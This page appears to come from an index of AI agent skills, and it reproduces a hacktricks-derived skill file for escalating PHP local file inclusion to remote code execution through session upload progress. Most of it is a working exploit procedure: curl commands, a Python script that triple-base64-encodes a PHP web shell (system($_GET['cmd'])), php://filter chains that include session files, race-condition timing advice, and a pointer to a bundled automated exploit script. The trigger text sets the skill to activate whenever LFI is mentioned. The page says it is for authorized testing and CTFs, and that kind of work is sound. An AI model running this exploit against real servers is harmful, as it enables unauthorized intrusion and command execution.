OpenSkillIndex← back to search

Hacktricks-skills lfi-php-session-exploit

Exploit Local File Inclusion (LFI) vulnerabilities using PHP session upload progress to achieve Remote Code Execution (RCE). Use this skill whenever the user mentions LFI, file inclusion vulnerabilities, PHP sessions, session upload progress, or needs to escalate an LFI to RCE. Also trigger when users are working on CTF challenges, penetration testing web applications, or analyzing PHP-based vulnerabilities involving session manipulation.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/file-inclusion/via-php_session_upload_progress/SKILL.MD
source content

LFI2RCE via PHP_SESSION_UPLOAD_PROGRESS

This skill helps you exploit Local File Inclusion vulnerabilities by leveraging PHP's 

session.upload_progress
feature to achieve Remote Code Execution (RCE).

When to Use This Skill

Use this technique when:

  • You've identified an LFI vulnerability in a PHP application
  • You don't have an active session but 
    session.auto_start
    is Off
  • session.upload_progress.enabled
    is On (default in PHP)
  • You need to escalate LFI to RCE
  • You're working on CTF challenges or authorized penetration testing

Vulnerability Overview

PHP's 

session.upload_progress
feature allows tracking of file uploads. When you provide 
PHP_SESSION_UPLOAD_PROGRESS
in multipart POST data, PHP automatically enables the session for you, even without a valid session cookie. This creates an opportunity to:

  1. Control session data - You can inject arbitrary content into the session file
  2. Include your payload - If the application includes session files, you can include your controlled content
  3. Achieve RCE - By injecting PHP shellcode into the session

The Race Condition Challenge

Important: The default 

session.upload_progress.cleanup
setting is 
On
, meaning the upload progress data is cleaned as soon as possible. This creates a race condition - you must include the session file before PHP cleans it.

The Prefix Problem

By default, PHP session files created via upload progress start with the prefix 

upload_progress_
. This means your session file will look like:

upload_progress_controlledcontentbyattacker

To remove this prefix and control the beginning of the file, use the base64 encoding trick:

  1. Base64 encode your payload 3 times
  2. Use 
    convert.base64-decode
    filter 3 times when including
  3. PHP removes the prefix characters during decoding
  4. Only your payload remains at the start

Exploitation Steps

Step 1: Verify the Vulnerability

Test if the target is vulnerable:

# Check if session is created with PHP_SESSION_UPLOAD_PROGRESS
curl http://target/ -H 'Cookie: PHPSESSID=test123' -F 'PHP_SESSION_UPLOAD_PROGRESS=blahblahblah' -F 'file=@/etc/passwd'

# On the server, check if session file was created
ls -la /var/lib/php/sessions/
# Look for: sess_test123

Step 2: Craft the Payload

Create a payload that will survive the base64 encoding/decoding process:

import base64
import sys

# Your PHP shellcode
payload = "<?php system($_GET['cmd']); ?>"

# Encode 3 times to remove the prefix
encoded = base64.b64encode(payload.encode()).decode()
encoded = base64.b64encode(encoded.encode()).decode()
encoded = base64.b64encode(encoded.encode()).decode()

print(encoded)

Step 3: Trigger the Race Condition

Send the multipart POST with your encoded payload:

curl -X POST http://target/vulnerable.php \
  -F "PHP_SESSION_UPLOAD_PROGRESS=<YOUR_BASE64_PAYLOAD>" \
  -F "file=@/etc/passwd"

Step 4: Include the Session File

Use the LFI to include your session with the decode filters:

# Include with 3x base64 decode filters
curl "http://target/vulnerable.php?file=php://filter/convert.base64-decode/convert.base64-decode/convert.base64-decode/resource=/var/lib/php/sessions/sess_<SESSION_ID>"

Step 5: Execute Commands

If successful, your shell will be active:

curl "http://target/vulnerable.php?file=php://filter/convert.base64-decode/convert.base64-decode/convert.base64-decode/resource=/var/lib/php/sessions/sess_<SESSION_ID>&cmd=id"

Complete Exploit Script

Use the bundled script 

exploit-php-session-lfi.py
for automated exploitation. It handles:

  • Payload encoding
  • Race condition timing
  • Session file location detection
  • Command execution

Common Session File Locations

PHP session files are typically stored in:

  • /var/lib/php/sessions/
  • /var/lib/php5/sessions/
  • /tmp/
  • /var/tmp/
  • /dev/shm/

Check 

session.save_path
in phpinfo() output if available.

Detection and Evasion

Signs the Target is Vulnerable

  • PHP application with file inclusion
  • session.upload_progress.enabled
    is On (default)
  • LFI vulnerability confirmed
  • Session files are world-readable

Bypass Techniques

  • Try different session paths
  • Use multiple concurrent requests to increase race condition success rate
  • Adjust timing between upload and include requests

References

Legal Notice

This skill is for authorized security testing and CTF challenges only. Always obtain proper authorization before testing any system. Unauthorized exploitation of vulnerabilities is illegal.